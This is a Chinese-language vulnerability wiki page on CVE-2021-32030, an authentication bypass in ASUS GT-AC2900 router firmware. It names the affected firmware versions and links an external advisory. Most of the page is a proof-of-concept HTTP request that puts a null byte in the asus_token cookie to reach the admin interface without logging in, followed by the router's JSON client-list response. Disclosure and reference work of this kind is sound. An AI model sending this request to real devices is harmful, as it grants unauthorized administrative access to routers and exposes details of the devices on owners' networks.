menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right 华硕-GT-AC2900-身份验证绕过(CVE-2021-32030).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    华硕-GT-AC2900-身份验证绕过(CVE-2021-32030).md
    1.19 KB / 2021-05-21 09:14:38
        # 华硕-GT-AC2900-身份验证绕过(CVE-2021-32030)

ASUS GT-AC2900管理员应用程序在处理未经身份验证的用户的远程输入时,容易受到身份验证绕过漏洞的攻击,从而导致对管理员界面的未经授权的访问。

受影响版本:

* ASUS GT-AC2900韧体版本9.0.0.4.386.41994(测试版)
* ASUS GT-AC2900韧体版本3.0.0.4.386.41793(最新生产)

详情分析可以见:https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md

通过在auth_check添加空字符进行绕过身份验证。

poc:

```
GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=\0Invalid; clickedItem_tab=0

HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close

{
"get_cfg_clientlist":[{"alias":"24:4B:FE:64:37:10","model_name":"GT-AC2900","ui_model_name":"GT-AC2900","fwver":"3.0.0.4.386_41793-gdb31cdc","newfwver":"","ip":"192.168.50.1","mac":"24:4B:FE:64:37:10","online":"1","ap2g":"24:4B:FE:64:37:10","ap5g":"24:4B:FE:64:37:14","ap5g1":"","apdwb":"","wired_mac":[
...
...
}
```
    links
    file_download